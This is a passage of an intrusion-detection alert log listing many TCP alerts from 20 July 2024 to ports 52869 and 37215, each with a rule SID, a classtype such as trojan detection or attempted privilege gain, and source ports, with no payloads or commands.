                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:49.741351
                      SID:2025132
                      Source Port:42866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:57.655207
                      SID:2025132
                      Source Port:47706
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.498156
                      SID:2025132
                      Source Port:47550
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.099889
                      SID:2027339
                      Source Port:60370
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.677189
                      SID:2831300
                      Source Port:54180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:54.277123
                      SID:2025132
                      Source Port:36376
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:55.994693
                      SID:2831300
                      Source Port:53774
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:58.751559
                      SID:2027339
                      Source Port:46830
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221248
                      SID:2829579
                      Source Port:44040
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.147883
                      SID:2027339
                      Source Port:59578
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.312736
                      SID:2027339
                      Source Port:45590
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.023857
                      SID:2027339
                      Source Port:45074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.497728
                      SID:2027339
                      Source Port:37924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.654988
                      SID:2835222
                      Source Port:60584
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:01.645032
                      SID:2027339
                      Source Port:33712
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.642449
                      SID:2829579
                      Source Port:59528
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.579360
                      SID:2027339
                      Source Port:39336
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.845923
                      SID:2831300
                      Source Port:55978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:13.157651
                      SID:2027339
                      Source Port:43672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.046626
                      SID:2835222
                      Source Port:54992
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.204975
                      SID:2835222
                      Source Port:55528
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.077930
                      SID:2025132
                      Source Port:42130
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:14.049602
                      SID:2835222
                      Source Port:57588
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.945909
                      SID:2027339
                      Source Port:42050
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.988055
                      SID:2835222
                      Source Port:34964
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.575986
                      SID:2027339
                      Source Port:57642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.016889
                      SID:2835222
                      Source Port:35002
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.944836
                      SID:2027339
                      Source Port:51548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.237113
                      SID:2025132
                      Source Port:51226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:55.666677
                      SID:2831300
                      Source Port:41774
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:40.301143
                      SID:2835222
                      Source Port:46342
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:08.291319
                      SID:2027339
                      Source Port:44488
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.326982
                      SID:2027339
                      Source Port:44320
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.239090
                      SID:2025132
                      Source Port:41492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.974551
                      SID:2835222
                      Source Port:49040
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.159166
                      SID:2831300
                      Source Port:60328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.180913
                      SID:2027339
                      Source Port:33620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:26.145029
                      SID:2027339
                      Source Port:33326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.474339
                      SID:2025132
                      Source Port:37058
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:14.366797
                      SID:2025132
                      Source Port:33794
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.431519
                      SID:2025132
                      Source Port:60390
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.477986
                      SID:2025132
                      Source Port:39374
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:48.447183
                      SID:2025132
                      Source Port:49718
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:25.589558
                      SID:2829579
                      Source Port:54630
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221624
                      SID:2829579
                      Source Port:56366
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.971718
                      SID:2025132
                      Source Port:54478
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.087294
                      SID:2025132
                      Source Port:48788
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.398920
                      SID:2027339
                      Source Port:34292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.453485
                      SID:2025132
                      Source Port:34196
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.963339
                      SID:2027339
                      Source Port:40804
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.469737
                      SID:2025132
                      Source Port:54336
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.701126
                      SID:2027339
                      Source Port:38500
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.975158
                      SID:2835222
                      Source Port:47600
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.362240
                      SID:2027339
                      Source Port:59436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.291616
                      SID:2835222
                      Source Port:50054
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.628180
                      SID:2027339
                      Source Port:53798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.081188
                      SID:2027339
                      Source Port:40076
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.909668
                      SID:2027339
                      Source Port:37138
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.962388
                      SID:2025132
                      Source Port:42806
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.706162
                      SID:2025132
                      Source Port:36246
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:01.623383
                      SID:2025132
                      Source Port:56122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.943244
                      SID:2829579
                      Source Port:57416
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.047411
                      SID:2835222
                      Source Port:42784
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.076414
                      SID:2835222
                      Source Port:44728
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.478924
                      SID:2027339
                      Source Port:43554
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.239928
                      SID:2025132
                      Source Port:36796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.350108
                      SID:2831300
                      Source Port:57110
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.143033
                      SID:2831300
                      Source Port:34238
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.692209
                      SID:2027339
                      Source Port:40688
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.370395
                      SID:2025132
                      Source Port:39598
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.280418
                      SID:2027339
                      Source Port:54748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.282556
                      SID:2025132
                      Source Port:57398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.995637
                      SID:2831300
                      Source Port:54930
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.489343
                      SID:2831300
                      Source Port:46452
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.199406
                      SID:2027339
                      Source Port:53044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.703412
                      SID:2025132
                      Source Port:41478
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.546338
                      SID:2831300
                      Source Port:57954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:59.738271
                      SID:2831300
                      Source Port:44640
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:52.001138
                      SID:2025132
                      Source Port:41364
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.104572
                      SID:2835222
                      Source Port:44332
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.039504
                      SID:2831300
                      Source Port:37938
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:58.216922
                      SID:2027339
                      Source Port:49966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.369883
                      SID:2027339
                      Source Port:53018
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:11.791090
                      SID:2025132
                      Source Port:50920
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.656963
                      SID:2831300
                      Source Port:40824
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:00.056416
                      SID:2025132
                      Source Port:43614
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:21.936545
                      SID:2835222
                      Source Port:60996
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.702517
                      SID:2025132
                      Source Port:33592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.280927
                      SID:2025132
                      Source Port:45798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.592254
                      SID:2027339
                      Source Port:59972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.632780
                      SID:2027339
                      Source Port:53350
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.894920
                      SID:2831300
                      Source Port:56832
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.630649
                      SID:2835222
                      Source Port:43630
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.936545
                      SID:2829579
                      Source Port:45502
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.985099
                      SID:2027339
                      Source Port:51738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.048113
                      SID:2829579
                      Source Port:38422
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.254249
                      SID:2027339
                      Source Port:40882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.132103
                      SID:2835222
                      Source Port:33446
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.882275
                      SID:2027339
                      Source Port:34572
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.099658
                      SID:2027339
                      Source Port:49536
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.181938
                      SID:2829579
                      Source Port:35458
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:02.527007
                      SID:2831300
                      Source Port:39876
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:51.888686
                      SID:2027339
                      Source Port:51016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.158279
                      SID:2829579
                      Source Port:37060
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.096223
                      SID:2027339
                      Source Port:48996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.937783
                      SID:2027339
                      Source Port:36150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.749737
                      SID:2835222
                      Source Port:34842
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.563906
                      SID:2027339
                      Source Port:50832
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.031141
                      SID:2025132
                      Source Port:54370
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.118475
                      SID:2027339
                      Source Port:55698
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:05.506482
                      SID:2025132
                      Source Port:47272
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:11.633481
                      SID:2829579
                      Source Port:53114
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.349550
                      SID:2027339
                      Source Port:41078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.266134
                      SID:2025132
                      Source Port:33396
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.543362
                      SID:2027339
                      Source Port:58208
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.886452
                      SID:2025132
                      Source Port:51918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.700893
                      SID:2025132
                      Source Port:38084
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.469580
                      SID:2027339
                      Source Port:33848
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.848727
                      SID:2025132
                      Source Port:53540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:21.928521
                      SID:2829579
                      Source Port:47998
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.996260
                      SID:2027339
                      Source Port:39878
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:16.647796
                      SID:2027339
                      Source Port:49650
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.114673
                      SID:2829579
                      Source Port:48702
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.365539
                      SID:2025132
                      Source Port:50400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.189694
                      SID:2027339
                      Source Port:52172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.285039
                      SID:2835222
                      Source Port:44938
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.905375
                      SID:2831300
                      Source Port:44260
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:07.036064
                      SID:2829579
                      Source Port:47242
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.374418
                      SID:2025132
                      Source Port:38966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.144379
                      SID:2831300
                      Source Port:56624
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:57.221132
                      SID:2829579
                      Source Port:37174
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.537092
                      SID:2831300
                      Source Port:60534
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:51.683848
                      SID:2027339
                      Source Port:39894
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.011895
                      SID:2027339
                      Source Port:43950
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.094795
                      SID:2829579
                      Source Port:49922
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.432263
                      SID:2831300
                      Source Port:38040
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:55.423260
                      SID:2025132
                      Source Port:32990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:07.075937
                      SID:2829579
                      Source Port:55146
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.598416
                      SID:2831300
                      Source Port:41014
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:52.701293
                      SID:2831300
                      Source Port:53376
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:36.102280
                      SID:2027339
                      Source Port:46296
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.058685
                      SID:2027339
                      Source Port:60424
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.607816
                      SID:2027339
                      Source Port:43644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.608153
                      SID:2831300
                      Source Port:37398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.054387
                      SID:2829579
                      Source Port:53574
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.807258
                      SID:2025132
                      Source Port:32990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:11.630112
                      SID:2025132
                      Source Port:37112
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.006773
                      SID:2831300
                      Source Port:55532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.584506
                      SID:2831300
                      Source Port:42566
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.698984
                      SID:2027339
                      Source Port:40512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.976984
                      SID:2835222
                      Source Port:57906
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.404974
                      SID:2027339
                      Source Port:40958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.108304
                      SID:2027339
                      Source Port:43398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.093903
                      SID:2835222
                      Source Port:41692
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.082384
                      SID:2829579
                      Source Port:44494
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:04.091867
                      SID:2027339
                      Source Port:36946
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.346494
                      SID:2027339
                      Source Port:60314
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.265254
                      SID:2027339
                      Source Port:33578
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.313050
                      SID:2027339
                      Source Port:52776
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.948093
                      SID:2025132
                      Source Port:43810
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:00.640312
                      SID:2829579
                      Source Port:35972
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:09.081648
                      SID:2831300
                      Source Port:40564
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.563416
                      SID:2027339
                      Source Port:46698
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.915268
                      SID:2829579
                      Source Port:44866
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.169212
                      SID:2831300
                      Source Port:44662
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:34.045143
                      SID:2829579
                      Source Port:51032
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.649188
                      SID:2027339
                      Source Port:51914
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.992284
                      SID:2831300
                      Source Port:47644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:48.255782
                      SID:2027339
                      Source Port:41630
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.624022
                      SID:2025132
                      Source Port:37678
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.511523
                      SID:2831300
                      Source Port:41908
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:48.191657
                      SID:2027339
                      Source Port:39676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.672944
                      SID:2027339
                      Source Port:60846
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.929013
                      SID:2829579
                      Source Port:53856
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.355589
                      SID:2829579
                      Source Port:57784
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.703494
                      SID:2831300
                      Source Port:46836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.611391
                      SID:2831300
                      Source Port:49644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.634372
                      SID:2835222
                      Source Port:50852
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.108909
                      SID:2027339
                      Source Port:56008
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.904906
                      SID:2829579
                      Source Port:48302
                      Destination Port:37215
                      Protocol:TCP
